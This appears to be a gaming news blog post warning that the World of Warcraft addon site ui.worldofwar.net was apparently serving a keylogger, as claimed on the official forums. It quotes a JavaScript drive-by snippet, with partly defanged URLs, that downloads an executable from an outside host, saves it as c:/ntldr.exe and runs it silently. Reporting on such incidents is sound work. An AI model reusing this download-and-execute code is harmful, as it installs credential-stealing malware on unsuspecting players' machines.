|
This is not the first time we will report on keylogging incidents for goliath MMO, World of Warcraft. Before we proceed though, let us make sure first that we are on the same page, okay?
Keystroke logging or keylogging per se is not inherently bad. Originally, it was developed to detect sources of errors in computer systems. The problem now is that same genius of a program is being used for hacking and spamming. The scam usually begins by telling a user to click on a link. Instead of bringing that user to the intended location, a keylogging software is installed discreetly. This then can be used to pick up usernames and passwords.
Now, on the official WoW forums, several users are claiming that a similar software is embedded into modification site ui.worldofwar.net. This is rather big news because the said site is one of the more "known and trusted" by players. Even here at QJ, we occasionally share with you tweaks from from that site.
One user provided these information:
 The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe- The actual keylogger iframe:
hxxp://ui.bcegame.com/wm.htm
- Keylogger iframe src:
xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run('c:/ntldr.exe',0);
Currently, several group of WoW players are telling the community to ban and abandon the modification site. Ar any rate, we will update you as things develop further. Thanks Victor for the heads up!
|
|
